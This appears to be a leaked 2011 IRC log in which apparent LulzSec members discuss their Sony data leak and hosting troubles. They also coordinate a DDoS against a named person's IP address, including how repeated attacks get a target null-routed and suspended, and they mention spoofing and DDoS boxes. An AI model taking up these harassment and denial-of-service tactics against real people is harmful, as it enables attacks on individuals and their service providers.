18:07:24Recursionthe IRC serverJun 02 18:07:25sabuneuronJun 02 18:07:27sabuso sign off?Jun 02 18:07:29sabulookJun 02 18:07:31stormSabuJun 02 18:07:31sabuguysJun 02 18:07:34neuronlol i just hopped onto another ipJun 02 18:07:35sabuneuronJun 02 18:07:37*	Topiary (t@HA-s05.rkn.75e5ku.IP) has joined #pure-eliteJun 02 18:07:39stormI use tor to connect to my ddos boxenJun 02 18:07:40saburecursion etcJun 02 18:07:40storm;xJun 02 18:07:46Recursionyup yupJun 02 18:08:06sabuif youre going to be in there its for research purposesJun 02 18:08:13joepie91not getting hit here :/Jun 02 18:09:04trollpollSabu, im using tor right now...Jun 02 18:09:04joepie91oheyJun 02 18:09:08joepie91Ryan is on 2600Jun 02 18:09:09stormte whole room is hitJun 02 18:09:13stormthe*Jun 02 18:09:17stormhes hitting random pplJun 02 18:09:22joepie91~b@vps.anon.suJun 02 18:09:23joepie91[02:07:22]         xxxx | hi kayla or sabu or tflowJun 02 18:09:25joepie91^ RyanJun 02 18:09:28neuronlulJun 02 18:09:30RecursionI'm out of thereJun 02 18:09:40stormwhy?Jun 02 18:09:41stormlolJun 02 18:09:44stormit's funnyJun 02 18:09:44stormxDJun 02 18:09:51stormset up ipv6Jun 02 18:09:51joepie91what should I say to Ryan?Jun 02 18:09:56stormthey obviously cant hit itJun 02 18:09:56Topiary&lt;laurelai&gt; nicely doneJun 02 18:10:01storm22:09 &lt;xxxx&gt; hi kayla or sabuJun 02 18:10:06stormhe pmed meJun 02 18:10:07stormroflJun 02 18:10:08neuronlulJun 02 18:10:13neuronsameJun 02 18:10:14Topiary[Laurelai] (~Laurelai@205.185.113.6): LaurelaJun 02 18:10:18joepie91lolJun 02 18:10:18TopiaryLaurelai leaked our logsJun 02 18:10:19neurongonna say im awineeJun 02 18:10:19TopiarystormJun 02 18:10:38joepie91uhJun 02 18:10:40joepie91TopiaryJun 02 18:10:40joepie91..Jun 02 18:10:43joepie91that is a Frantech IPJun 02 18:10:48TopiaryFIREFIREFIREFIREJun 02 18:10:52TopiaryFUCK YOU FRANTECH\111Jun 02 18:10:52joepie91DDoS itJun 02 18:10:54sabueverybody stfuJun 02 18:10:54joepie91it will disappearJun 02 18:10:55storm?Jun 02 18:10:56joepie91in a few minutesJun 02 18:10:56sabuEVERYONEJun 02 18:10:57sabuSTFUJun 02 18:11:02saburelaxJun 02 18:11:06sabuas for ryanJun 02 18:11:13sabuignore himJun 02 18:11:16sabuhe doesnt know its usJun 02 18:11:18sabujesusJun 02 18:11:27joepie91relax :PJun 02 18:11:30trollpolli left 2600...Jun 02 18:11:36TopiaryRyan huh?Jun 02 18:11:36sabuok.Jun 02 18:11:39stormyou guys are ridiculous xDJun 02 18:11:43trollpollthe situation is getting horrible stressingJun 02 18:11:43sabuI know jesusJun 02 18:11:46sabulookJun 02 18:11:49sabufrom now onJun 02 18:12:05sabuno one goes on 2600 unless you prep yourselfl for the social engineeringJun 02 18:12:11sabuif you dont know how to social engineer do not get on 2600Jun 02 18:12:17sabuif you do not have a ddos protected ipJun 02 18:12:20sabudo not get on 2600Jun 02 18:12:23sabuthats itJun 02 18:12:28storm^Jun 02 18:12:29neuronAyeJun 02 18:12:30stormexactly itJun 02 18:12:32stormandJun 02 18:12:34stormfor startersJun 02 18:12:35joepie91it's not ddos protected, but disposable nevertheless :PJun 02 18:12:40stormill give anyone an ipv6 shellJun 02 18:12:42stormstraight upJun 02 18:12:42Recursionaye-aye, stormJun 02 18:12:46stormcause i love you guysJun 02 18:12:46RecursionerrJun 02 18:12:47storm:DJun 02 18:12:47RecursionSabu:Jun 02 18:12:51trollpollhahahaJun 02 18:12:54sabuyesJun 02 18:13:07RecursionI meant to say, aye-aye Sabu , not stormJun 02 18:13:09Recursionmuhbad.Jun 02 18:13:11sabuokJun 02 18:13:11stormlol.Jun 02 18:13:18sabusony was leakedJun 02 18:13:22sabuwe got bigger projectsJun 02 18:13:37sabuatm neuron has access to source code to scedev.net socny dev teamJun 02 18:13:38*	Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-eliteJun 02 18:13:41sabuhow about those who are not busyJun 02 18:13:42joepie91Topiary: just a tip, Frantech has an automated nullrouting system in place. If you DDoS Laurelais IP, he will disappear from the internet for a while, and if you keep doing it he will be booted from their service.Jun 02 18:13:49sabuwork on auditing that srcJun 02 18:14:02TopiaryI'm off to bed in a fewJun 02 18:14:04sabustorm, hear that?Jun 02 18:14:08sabudrop that ipJun 02 18:14:08stormsup?Jun 02 18:14:10neuronIm on it currently talking to more peopleJun 02 18:14:15sabuTopiary[Laurelai] (~Laurelai@205.185.113.6): LaurelaJun 02 18:14:20stormok gimme a fewJun 02 18:14:22stormrebootingJun 02 18:14:22sabukkJun 02 18:14:24sabunowJun 02 18:14:25TopiaryLaurelai was the one who compromised our HBGay logsJun 02 18:14:29Topiaryso yesJun 02 18:14:29stormim on dozeJun 02 18:14:31joepie91it'll get nullrouted for ~1 hour at first I believeJun 02 18:14:36joepie91after a few nullroutes he will get suspendedJun 02 18:14:37joepie91:)Jun 02 18:14:44stormrebooting nowJun 02 18:15:32&lt;palladium&gt;	Hi everyone!Jun 02 18:15:46neuron0-0 o/Jun 02 18:16:00neuronHI! who are you and whats your posion?Jun 02 18:16:46neuronFor funzies Topiary: we have a IAMA request on reddit if your intrestedJun 02 18:16:58joepie91- CrazyD quit (Quit: Sure is #ifeds)Jun 02 18:17:00joepie91lolwutJun 02 18:17:08Topiarywhat's that?Jun 02 18:17:19Topiary@ NeuronJun 02 18:17:24neurona IAMAJun 02 18:17:31neuronbasically a Qand A session on redditJun 02 18:17:39neuronwere redditors ask questions an you answerJun 02 18:18:00sabuwaitJun 02 18:18:06sabuyou guys started a iama on reddit?Jun 02 18:18:49Recursion...Jun 02 18:19:00sabuI will go to your homes and kill you.Jun 02 18:19:10stormyoJun 02 18:19:13RecursionNeuron: are you serious?Jun 02 18:19:17sabuif you really started an iama broJun 02 18:19:24sabuyou really dont understand what we are about hereJun 02 18:19:51kl0psok guys, i have to go to bed. see you tomorrow. btw lulzsec is so funny :D ... love yaJun 02 18:19:54kl0psgn8Jun 02 18:20:03stormnightJun 02 18:20:06sabugoodnight kl0psJun 02 18:20:06Recursiong'nightJun 02 18:20:14RecursionNeuronJun 02 18:20:15*	kl0ps has quit (Quit: Leaving)Jun 02 18:20:17RecursionffsJun 02 18:20:50sabuI dont see itJun 02 18:21:08trollpollSabu, mmm, what do you think about doing some "tutorials" on how to act, how to protect ourselves, etc...Jun 02 18:21:16trollpollsomething quick and dirtyJun 02 18:21:43sabuI think soJun 02 18:21:44Topiarylet's not do a Q&amp;A with RedditJun 02 18:21:57sabuI thought all this stuff was common knowledgeJun 02 18:22:04Recursionwe shouldn't interface with the public any more than we have toJun 02 18:22:12Topiarytwitter is enoughJun 02 18:22:21Topiaryour formspring was dumb so I stopped answering questions weeks agoJun 02 18:22:23Recursionindeed.Jun 02 18:22:32stormSabuJun 02 18:22:40stormI have to leave can you keep that IP for later?Jun 02 18:22:42*	Sabu has changed the topic to: pE | NO LEAKS | NO MEDIA | Talk to Sabu OR Topiary if unsure.Jun 02 18:22:48sabuyup save it for laterJun 02 18:22:51stormOKJun 02 18:22:53stormgood game.Jun 02 18:22:55sabumuahJun 02 18:23:03stormI gotta go to that thing we talk about from time to timeJun 02 18:23:04storm;)Jun 02 18:23:07stormI'll be backJun 02 18:23:10joepie91fap?Jun 02 18:23:14stormtext me if shit gets knocked you feel me?Jun 02 18:23:15stormnaJun 02 18:23:15trollpollsure fapJun 02 18:23:15joepie91:PJun 02 18:23:25stormbtwJun 02 18:23:31stormpeople are dropping the ipv6 serverJun 02 18:23:31joepie91fap. always fap.Jun 02 18:23:37stormthey want us to be opless.Jun 02 18:23:45joepie91friend of mine just dropped tooJun 02 18:23:52trollpollperhaps is not a bad idea to leave 2600 ...Jun 02 18:23:58stormperhapsJun 02 18:24:00Recursionas I saidJun 02 18:24:00Topiaryyeah let's chill somewhere elseJun 02 18:24:01stormbecause for oneJun 02 18:24:03Topiaryeveryone wanna leave?Jun 02 18:24:04joepie91strangely I dont ping out yetJun 02 18:24:06trollpollfeds will start searching ips of random usersJun 02 18:24:08stormI'm not going to drop a ton of usersJun 02 18:24:09Recursiondont interface with the public more than you need toJun 02 18:24:17stormto priotect a shit channel on shitty serversJun 02 18:24:20stormprotect evenJun 02 18:24:21stormalthoughJun 02 18:24:22sabulookJun 02 18:24:26stormhaving a fanbase is funJun 02 18:24:30sabuclose channelJun 02 18:24:33sabufirstJun 02 18:24:36sabumod channelJun 02 18:24:37sabu+mJun 02 18:24:49stormdoneJun 02 18:24:50sabulet everyone know 2600 irc was temporary for meeting fans or whateverJun 02 18:24:51stormnow what?Jun 02 18:24:52sabusee us on twitterJun 02 18:24:58sabuand just close the chan downJun 02 18:25:04sabuthrow a crackhead bot in there and keep it movingJun 02 18:25:08neuronrgrJun 02 18:25:14sabuneuron let storm do itJun 02 18:25:16RecursionNeuron: did you start an AMA?Jun 02 18:25:16joepie91I think a server just diedJun 02 18:25:41Topiarynow we all leaveJun 02 18:25:43Topiaryeveryone /partJun 02 18:25:51sabuyeahJun 02 18:25:53trollpollthats itJun 02 18:25:57sabuno more public apperancesJun 02 18:26:00sabuwitohut us organizing itJun 02 18:26:03neuronleftJun 02 18:26:05sabuthanks storm for holding it downJun 02 18:26:05trollpollgreatJun 02 18:26:13sabuguys from now onJun 02 18:26:22stormdoneJun 02 18:26:23sabuif you are not familiar with these hostile environmentsJun 02 18:26:25neuronFew seocndsJun 02 18:26:35sabudon't partake in itJun 02 18:26:38stormï¿½ï¿½ï¿½ SignOff hentrax: #lulzsec (Ping timeout: 240 seconds)Jun 02 18:26:38stormï¿½ï¿½ï¿½ SignOff home_keys: #lulzsec (Quit: Leaving)Jun 02 18:26:38stormï¿½ï¿½ï¿½ SignOff haraldo: #lulzsec (Quit: Leaving.)Jun 02 18:26:38stormï¿½ï¿½ï¿½ fancypants is now known as lessthanthreeJun 02 18:26:38stormï¿½ï¿½ï¿½ happyhour [~hehe@124-148-131-129.dyn.iinet.net.au] has joined #lulzsecJun 02 18:26:38stormï¿½ï¿½ï¿½ SignOff Anonique88: #lulzsec ()Jun 02 18:26:38stormï¿½ï¿½ï¿½ BlizWar [~kruppa@a88-112-133-232.elisa-laajakaista.fi] has left #lulzsecJun 02 18:26:38storm[]Jun 02 18:26:38stormï¿½ï¿½ï¿½ SignOff SL1CHAOS: #lulzsec ()Jun 02 18:26:38stormï¿½ï¿½ï¿½ SignOff [KGB]Derungo: #lulzsec ()Jun 02 18:26:39stormroflJun 02 18:26:44stormright after topic changeJun 02 18:26:55neuronbwhahaJun 02 18:26:58stormand yeah guysJun 02 18:26:59stormbtwJun 02 18:27:03sabuyeah bro?Jun 02 18:27:04joepie91[02:26:51]             -=- nyannyan is now known as WANT2CHATJun 02 18:27:04joepie91[02:26:53]             -=- BUT_WANT_TO_TRO is now known as WANT_TO_TROLLJun 02 18:27:06stormdon't freak out over some packetsJun 02 18:27:08stormyou're all fineJun 02 18:27:13sabuyesJun 02 18:27:14stormthat guy barely had 100mbpsJun 02 18:27:19neuronhaha yeah i wasn't worried :PJun 02 18:27:20joepie91lolJun 02 18:27:30joepie91btwJun 02 18:27:31stormi logged the ddos on my server in the .nlJun 02 18:27:32joepie91madjack diedJun 02 18:27:33joepie91:PJun 02 18:27:46RecursionI was a magicjack.Jun 02 18:27:46joepie91so inb4 massive ping timeout/splitJun 02 18:28:10stormwhos bottle_of_rumJun 02 18:28:18trollpolllol?Jun 02 18:28:20stormhe/she tried to evade my +modeJun 02 18:29:20joepie91stormJun 02 18:29:23joepie91that is not very usefukJun 02 18:29:27joepie91useful*Jun 02 18:29:35joepie91on a server where your host can be an unmasked ipJun 02 18:29:36joepie91lolJun 02 18:29:36stormwhat?Jun 02 18:29:38storm./fuckemJun 02 18:29:39storm?Jun 02 18:29:44joepie91you banned a-zJun 02 18:29:45joepie91in hostnameJun 02 18:29:50stormi did a bitchx commandJun 02 18:29:52stormcalled fuckemJun 02 18:29:53joepie91if your host can be 1.2.3.4 that's not very usefulJun 02 18:29:55joepie91ahJun 02 18:29:56joepie91fix it thenJun 02 18:29:56joepie91lolJun 02 18:29:58stormits not for looks its for lulzJun 02 18:30:04stormthis server is no moreJun 02 18:30:06stormrelax.Jun 02 18:30:13joepie91you didnt ban everyone thoughJun 02 18:30:14joepie91:PJun 02 18:30:15stormlet me do my thing ploxJun 02 18:30:21stormI didn't ban anyoneJun 02 18:30:28joepie91lolololololJun 02 18:30:29joepie91splitJun 02 18:30:33stormye./Jun 02 18:30:35stormye.*Jun 02 18:30:38stormafkJun 02 18:31:25*	pwnsauce (pwnsauce@HA-ntp.a04.d005o9.IP) has left #pure-eliteJun 02 18:32:29neuronSabu:Jun 02 18:32:39stormtxt me your number sabuziJun 02 18:32:41stormi lost itJun 02 18:32:47stormbbl @g@inJun 02 18:38:21neuron0-0\Jun 02 18:38:23neuronthat was funJun 02 18:41:30trollpolley guys, this is not a funeral xDJun 02 19:03:22*	Sabu has quit (Ping timeout: 121 seconds)Jun 02 19:05:42neuronp.s i didnt make a IAMA on reddit was a misunderstandingJun 02 19:08:29trollpollwell, i dont think this is a problem bigger than having a twitter account, or a webpage, but is important to know what to do with itJun 02 19:08:47neuronayeJun 02 19:08:51neuronwere goodJun 02 19:11:36*	Palladium has quit (Quit: Lost terminal)Jun 02 19:12:02RecursionI always wondered why lulzsec is hosted on same server as these sites:Jun 02 19:12:02RecursionFound 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155).Jun 02 19:12:02Recursionlulzsecurity.comJun 02 19:12:02Recursionsale4gucci.comJun 02 19:12:02Recursionwww.louisvuitton4bag.comJun 02 19:12:57neuronlolJun 02 19:13:57neuronbbiabJun 02 19:18:00*	Neuron has quit (Ping timeout: 121 seconds)Jun 02 19:18:10*	Sabu (sabu@HA-v86.0ft.1icbev.IP) has joined #pure-eliteJun 02 19:18:19*	Sabu has quit (Connection closed)Jun 02 19:19:13*	Sabu (sabu@HA-06g.14k.jdcvo3.IP) has joined #pure-eliteJun 02 19:22:39Recursionwww.sale4gucci.comJun 02 19:22:43*	Topiary has quit (Ping timeout: 121 seconds)Jun 02 19:22:43Recursionalso thatJun 02 19:23:17RecursionSabu:Jun 02 19:23:18Recursion16:12:06 &lt;@Recursion&gt; I always wondered why lulzsec is hosted on same server as these sites:Jun 02 19:23:18Recursion16:12:06 &lt;@Recursion&gt; Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155).Jun 02 19:23:18Recursion16:12:06 &lt;@Recursion&gt; lulzsecurity.comJun 02 19:23:18Recursion16:12:06 &lt;@Recursion&gt; sale4gucci.comJun 02 19:23:18Recursion16:12:06 &lt;@Recursion&gt; www.louisvuitton4bag.comJun 02 19:26:04trollpollthis means that the host desnt ask about the web activity xDDDJun 02 19:27:40trollpollnightJun 02 19:27:44*	trollpoll has quit (Quit: Leaving)Jun 02 19:30:15sabuit hs nothing to do with usJun 02 19:30:28Recursionjust saying brotherJun 02 19:59:55*	lol gives channel operator status to SabuJun 02 20:22:33*	Disconnected (Invalid argument).**** ENDING LOGGING AT Thu Jun  2 20:22:33 2011**** BEGIN LOGGING AT Fri Jun  3 13:15:48 2011Jun 03 13:15:48*	Now talking on #pure-eliteJun 03 13:15:48*	Topic for #pure-elite is: pE | Today we're having a meeting - stick aroundJun 03 13:15:48*	Topic for #pure-elite set by Sabu!sabu@HA-06g.14k.jdcvo3.IP at Fri Jun  3 09:41:46 2011Jun 03 13:17:46sabujeaaaJun 03 13:18:01[redacted]chyeaaaaJun 03 13:18:17[redacted]so tell me about the new sony hackJun 03 13:18:20[redacted]and all the lulz i missedJun 03 13:18:33sabuwe just dorpped what we hadJun 03 13:18:37[redacted]ohJun 03 13:18:41sabueveryone went crazy for itJun 03 13:18:42saburoflJun 03 13:18:44[redacted]you mean with the coupons?Jun 03 13:18:57[redacted]was it from that SQLiJun 03 13:21:57sabuyeahJun 03 13:22:23loland @lulzsec now has more than 34,000 folowers xDJun 03 13:23:07sabuniceeeJun 03 13:25:14joepie91somehowJun 03 13:25:18joepie91when you have to do something in a hurryJun 03 13:25:21joepie91everything goes wrongJun 03 13:25:26joepie91._.Jun 03 13:27:45sabuyeahJun 03 13:28:07joepie91internet goes derpJun 03 13:28:18joepie91filezilla raeps the master table or w/e it's calledJun 03 13:28:27joepie91notepad starts lagging my cpu for some reasonJun 03 13:28:28joepie91&gt;.&gt;Jun 03 13:42:06tflowLOLJun 03 13:42:07tflowLOLJun 03 13:42:07tflowLOLJun 03 13:42:14tflowcloudflare = fucked up hardcoreJun 03 13:42:14joepie91?Jun 03 13:42:16tflowhttp://www.searchdiscovered.com/?dn=INSERT%20INTO%20%60subdomains%60%20%28%60subdomain_name%60%29%20VALUES&amp;pid=5POXE2HY6Jun 03 13:42:22joepie91that's not cloudflareJun 03 13:42:22tflow&gt;INSERT INTO 'subdomains' ('subdomain_name')Jun 03 13:42:23joepie91that is byethostJun 03 13:42:24joepie91lolJun 03 13:42:25tflowi knowJun 03 13:42:31tflowwelJun 03 13:42:32tflowyeahJun 03 13:42:33tflowit could beJun 03 13:42:37joepie91it is :PJun 03 13:42:42tflowbut when you go to the site it redirects to thatJun 03 13:42:45joepie91yeJun 03 13:42:51joepie91because byethost could not find the file at firstJun 03 13:42:53joepie91thus redirected thereJun 03 13:42:55joepie91as "error page"Jun 03 13:43:05joepie91and cloudflare cached the redirectJun 03 13:43:14joepie91but if you check the IP that shit is hosted onJun 03 13:43:21joepie91you'll see it's byethost, not cf :)Jun 03 13:43:29joepie91byethost has like 61234612346 domainsJun 03 13:45:41joepie912011-06-03 19:45:12 Connecting lulzsecurity.com:80Jun 03 13:45:41joepie912011-06-03 19:45:12 ConnectedJun 03 13:45:41joepie912011-06-03 19:45:12 GET /releases/x_factor_contestants_database.sql HTTP/1.0Jun 03 13:45:41joepie912011-06-03 19:45:12 Host: lulzsecurity.comJun 03 13:45:41joepie912011-06-03 19:45:12 Cookie: __cfduid=db7dd1e6b9d039ee2820200b883a7ee291307121478Jun 03 13:45:41joepie912011-06-03 19:45:12 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)Jun 03 13:45:41joepie912011-06-03 19:45:12 Accept: */*Jun 03 13:45:41joepie912011-06-03 19:45:12 Pragma: no-cacheJun 03 13:45:41joepie912011-06-03 19:45:12 Cache-Control: no-cacheJun 03 13:45:41joepie912011-06-03 19:45:12 Connection: closeJun 03 13:45:42joepie912011-06-03 19:45:14 HTTP/1.1 404 Not FoundJun 03 13:45:43joepie912011-06-03 19:45:14 Server: cloudflare-nginxJun 03 13:45:44joepie912011-06-03 19:45:14 Date: Fri, 03 Jun 2011 17:45:11 GMTJun 03 13:45:45joepie912011-06-03 19:45:14 Content-Type: text/htmlJun 03 13:45:46joepie912011-06-03 19:45:14 Connection: closeJun 03 13:45:47joepie912011-06-03 19:45:14 Accept-Ranges: bytesJun 03 13:45:48joepie912011-06-03 19:45:14 Vary: User-AgentJun 03 13:45:49joepie912011-06-03 19:45:14 Cache-Control: public, proxy-revalidateJun 03 13:45:50joepie912011-06-03 19:45:14 X-Cache: MISS from demil1.byetcluster.comJun 03 13:45:51joepie912011-06-03 19:45:14 Via: 1.1 demil1.byetcluster.com:80 (Lusca/LUSCA_HEAD-r14756)Jun 03 13:45:52joepie91;_;Jun 03 13:46:21joepie91byet gives a 404Jun 03 13:46:34*	joepie91 calmly waits for files to propagateJun 03 13:48:22joepie91Webspace:5632 MBJun 03 13:48:23joepie91Disk space used0 MBJun 03 13:48:23joepie91Disk Free 5632 MBJun 03 13:48:23joepie91whatJun 03 13:48:33joepie91&gt;disk space used 0Jun 03 13:49:17joepie91Bandwidth:204800 MBJun 03 13:49:17joepie91Bandwidth used:481 MBJun 03 13:49:17joepie91Bandwidth remaining:204319 MBJun 03 13:49:19joepie91riightJun 03 14:06:24joepie91mkJun 03 14:06:28joepie91all sony links are working on this nodeJun 03 14:06:30joepie91the rest is still brokenJun 03 14:08:01tflowbyethost is crewing upJun 03 14:08:10tflowone minute it works, next minute is redirects to portalJun 03 14:08:33tflowtoo many mood swingsJun 03 14:08:58joepie91tflowJun 03 14:09:08joepie91as far as I know Cloudflare has a different cache for every nodeJun 03 14:09:08*	virtual (virtual@HA-dfm.tk3.kjaj4b.IP) has joined #pure-eliteJun 03 14:09:23&lt;virtual&gt;	hiJun 03 14:09:23joepie91that was why some people got errors when anonnews went down, while others could view an offline versionJun 03 14:09:28&lt;virtual&gt;	douh...Jun 03 14:09:31*	virtual is now known as trollpollJun 03 14:09:39joepie91thus, some nodes will have the redirect cachedJun 03 14:09:44joepie91while others have the actual files alreadyJun 03 14:09:48joepie91that is why I asked you to purge cacheJun 03 14:09:55joepie91so that all nodes will be forced to update their cacheJun 03 14:10:08*	tflow has quit (A TLS packet with unexpected length was received.)Jun 03 14:10:10joepie91.Jun 03 14:10:34*	tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-eliteJun 03 14:10:37joepie91wbJun 03 14:10:43joepie91paste incomingJun 03 14:10:45joepie91joepie91tflowJun 03 14:10:45joepie91joepie91as far as I know Cloudflare has a different cache for every nodeJun 03 14:10:45joepie91joepie91that was why some people got errors when anonnews went down, while others could view an offline versionJun 03 14:10:45joepie91joepie91thus, some nodes will have the redirect cachedJun 03 14:10:45joepie91joepie91while others have the actual files alreadyJun 03 14:10:45joepie91joepie91that is why I asked you to purge cacheJun 03 14:10:45joepie91joepie91so that all nodes will be forced to update their cacheJun 03 14:10:50tflowye, sawJun 03 14:10:53tflowhey trollpollJun 03 14:11:01trollpolleyyy tflow !Jun 03 14:11:08joepie91but ye, a purge cache should solve everythingJun 03 14:11:29tflowthe problem isn't @ cloudflareJun 03 14:11:32tflowit's @ bytehostJun 03 14:11:35tflowi tried with tamper dataJun 03 14:11:39trollpolli saw the opiran leakJun 03 14:11:40joepie91it isn't...Jun 03 14:11:40tflowit redirected to the portal pageJun 03 14:11:44joepie91you cannot force a reloadJun 03 14:11:46tfloweven with the lulzsec domainJun 03 14:11:51tflowtrust meJun 03 14:11:52tflowit isJun 03 14:11:54joepie91..Jun 03 14:11:55trollpollthe emails came to us from an anonymous source?Jun 03 14:12:01tflowif you connect directly to byethostJun 03 14:12:07sabucrazy trolllpollJun 03 14:12:10tflowthen you'll get the portalJun 03 14:12:10joepie91how are you directly connecting to byethostJun 03 14:12:16trollpolli hope not...Jun 03 14:12:19joepie91ohfuckJun 03 14:12:21joepie91..Jun 03 14:12:22tflowtyping in the ip + modifying host headerJun 03 14:12:27joepie91ehJun 03 14:12:33joepie91I am not sure how the byethost dns works..Jun 03 14:12:36joepie91erJun 03 14:12:37joepie91network*Jun 03 14:12:42joepie91they have server clustersJun 03 14:12:45joepie91so that may be an issueJun 03 14:12:52tflowtrueJun 03 14:12:54joepie91that you are sending a request to a server that is not supposed to handle the requestJun 03 14:13:02joepie91can you add multiple A records in cloudflare?Jun 03 14:13:13tflowi think soJun 03 14:13:16tflowwhy?Jun 03 14:13:22tflowalsoJun 03 14:13:34tflowns1.byet.org resolves lulzsec to a different iJun 03 14:13:35tflowipJun 03 14:13:40tflowns1-5Jun 03 14:13:45tflowwhich do not work at allJun 03 14:13:53tflowso i'm simply using the ip of byethost14.comJun 03 14:14:03tfloweven though that's not the listen ip for lulzsec in their nameserversJun 03 14:14:04joepie91mmJun 03 14:14:05joepie911 secJun 03 14:14:25tflowlisted*Jun 03 14:18:10joepie91tflowJun 03 14:18:13joepie91point it to  209.51.196.244Jun 03 14:18:24joepie91I modified my hosts fileJun 03 14:18:28joepie91and if I set it to thatJun 03 14:18:29joepie91it worksJun 03 14:18:33tfloware you sureJun 03 14:18:39tflowlet me tryJun 03 14:19:57tflowdoesn't work hereJun 03 14:20:24joepie91WTF.Jun 03 14:20:30joepie91byethost.comJun 03 14:20:30joepie91This account is currently suspended.Jun 03 14:20:30joepie91It appears that this account's free hosting quota has been fully used! We would highly recommend upgrading your account here : Securesignup.net , then create a ticket at http://byet.org/premiumsupport requesting the free hosting account to be migrated to the new paid account.Jun 03 14:20:45tflow..Jun 03 14:20:47tflowwhere's that?Jun 03 14:20:53joepie91on loginJun 03 14:20:53joepie91idkJun 03 14:20:57joepie91k secJun 03 14:21:10tflowwhat quota .__.Jun 03 14:21:24joepie91I have no clueJun 03 14:21:29joepie91http://zymic.com/Jun 03 14:21:33joepie91sign up thereJun 03 14:21:37joepie91it's what opmetalgear uses as wellJun 03 14:21:41*	joepie91 sighsJun 03 14:21:55joepie91it's probably best to let byethost rest for nowJun 03 14:22:01joepie91or it'll become hours of troubleshootingJun 03 14:24:30tflowughJun 03 14:24:33tflowdon't worryJun 03 14:24:39tflowi have somewhere to host it nowJun 03 14:24:43joepie91ahJun 03 14:24:51*	joepie91 shoots MurphyJun 03 14:33:43joepie91these people...Jun 03 14:33:44joepie91@chuckufJun 03 14:33:45joepie91Charles FarleyJun 03 14:33:45joepie91trying to get to lulzsecurity.com via various Tor exit nodes appear to be blocked by the host due to being a 'spam bot'.Jun 03 14:33:48joepie91honestlyJun 03 14:33:52joepie91if you are "blocked"Jun 03 14:34:00joepie91you pretty much get a "fill in captcha to continue"Jun 03 14:34:01joepie91in your faceJun 03 14:34:10joepie91how can you even have the misconception that you are completely blocked :|Jun 03 14:35:43joepie91LOLJun 03 14:35:44joepie91http://twitter.com/#!/tpbJun 03 14:35:52joepie91@tpbJun 03 14:35:52joepie91The Pirate BayJun 03 14:35:52joepie91Sony Hacked Again, Account Data Posted to the Pirate Bay: LulzSec, aka the Lulz Boat, compromised the personal d... http://bit.ly/mn3Q3xJun 03 14:36:02joepie91moaaarrrr publicityJun 03 14:36:45sabuoh boyyJun 03 14:38:57trollpolltwitter account of lulzsec has more than 35.000 followers O_O... craziness...Jun 03 14:39:48trollpollis close to pass @sony :)Jun 03 14:40:02joepie91@pyteyJun 03 14:40:02joepie91pyteyJun 03 14:40:02joepie91If I wasn't married I'd like to have @LulzSec as my girlfriend.Jun 03 14:45:24joepie91LOLJun 03 14:45:25joepie91SabuJun 03 14:45:27joepie91@Jake_WJun 03 14:45:27joepie91Jake WalkerJun 03 14:45:27joepie91I wonder if @Sony's ever tried Microsoft Security Essentials? It's free and probably an upgrade over their current security measures.Jun 03 14:45:36sabuROFLJun 03 14:45:43sabuabsurd hahhahaJun 03 14:45:46joepie91retweet that lolJun 03 14:45:59sabutell topiaryJun 03 14:46:03joepie91Topiary DINGJun 03 14:46:09Topiary?Jun 03 14:46:13joepie91retweet thatJun 03 14:46:17joepie91http://twitter.com/#!/Jake_W/status/76718192852090880Jun 03 14:46:19TopiarykJun 03 14:46:22joepie91:PJun 03 14:46:48stormhiJun 03 14:47:37lolomg &lt;3 thisJun 03 14:47:37lolhttp://techliberation.com/wp-content/uploads/2011/06/poptartFINALTINY.gifJun 03 14:48:26*	joepie91 saveJun 03 14:52:34stormi just woke up againJun 03 14:52:37storm&gt;:xJun 03 14:52:40joepie91morning xDJun 03 14:52:45stormthanksJun 03 14:54:42trollpolllulzsec.... the reign where the sun never set...Jun 03 14:56:51joepie91jesus christJun 03 14:56:54joepie91all bitcoin sites are slowJun 03 14:56:54joepie91atmJun 03 15:01:45storm-:- Channel #lulzsec was created at Fri Jun  3 02:59:10 2011Jun 03 15:01:45storm-:- BitchX: Join to #lulzsec was synched in 0.204 secs!!Jun 03 15:01:45storm-:- r0d3nt  No such serverJun 03 15:01:45storm-:- BitchX: Generating irc server mapJun 03 15:01:45storm-:-  madjack.2600.net [0]Jun 03 15:01:54stormlmfaoJun 03 15:02:05storm-:- Topic (#2600): 2600 | Get your faux onJun 03 15:02:05storm-:- Topic (#2600): set by jax!~jax@184.107.140.210 at Thu Jun  2 23:34:40 2011Jun 03 15:02:05storm-:- [Users(#2600:11)]Jun 03 15:02:05storm[ hatred    ] [ _kb       ] [vpsypete   ] [vAngryNerdA] [vschrodinge]Jun 03 15:02:05storm[vmaxim     ] [vkutio     ] [vdizopsin  ] [vElectRo'  ] [vz0t       ]Jun 03 15:02:05storm[vbinary_   ]Jun 03 15:02:17stormsorry guisJun 03 15:02:21stormdid i sink your ship?Jun 03 15:03:12lollolJun 03 15:03:24stormhey kaylaJun 03 15:03:50*	storm hits ism electronic cigaretteJun 03 15:03:55stormhis evenJun 03 15:03:56storm:DJun 03 15:04:39trollpoll@2600 The next "reporter" who calls us asking to speak to someone from @LulzSec is going to lose their phone privileges. We're serialJun 03 15:04:42lolhihihihihihhi \:D/Jun 03 15:04:43trollpollhilarious xDDDJun 03 15:05:11stormtrollJun 03 15:05:16stormi posted that last nightJun 03 15:05:18stormit is lulzJun 03 15:05:32storm\o/Jun 03 15:05:41stormHACK US AND WE WILL BOMB YOU. - ObamaJun 03 15:05:48trollpolldidnt see :P nice lulz yeJun 03 15:05:54trollpollyes, this is not so lulz... :PJun 03 15:06:03stormlolJun 03 15:06:05trollpolland the NATO doc too...Jun 03 15:06:12stormi didnt see itJun 03 15:06:28trollpollNATO document talking about anonymousJun 03 15:06:29*	storm gives channel operator status to TopiaryJun 03 15:06:35stormohJun 03 15:06:36trollpollthat must be prosecutedJun 03 15:06:43stormyeah i saw thatJun 03 15:06:58trollpollone of these days we will have tanks on our homes...Jun 03 15:07:19stormyeah no shitJun 03 15:07:28trollpollhttp://www.nato-pa.int/default.asp?SHORTCUT=2443Jun 03 15:07:28stormscary stuffJun 03 15:07:31trollpollthis is the report...Jun 03 15:07:45trollpollthat =XXXX make me tent....Jun 03 15:08:19stormi need to somehow get more spoofing boxesJun 03 15:08:27stormi have a few networks listed that allow itJun 03 15:09:09trollpolli now a "complicated" technology 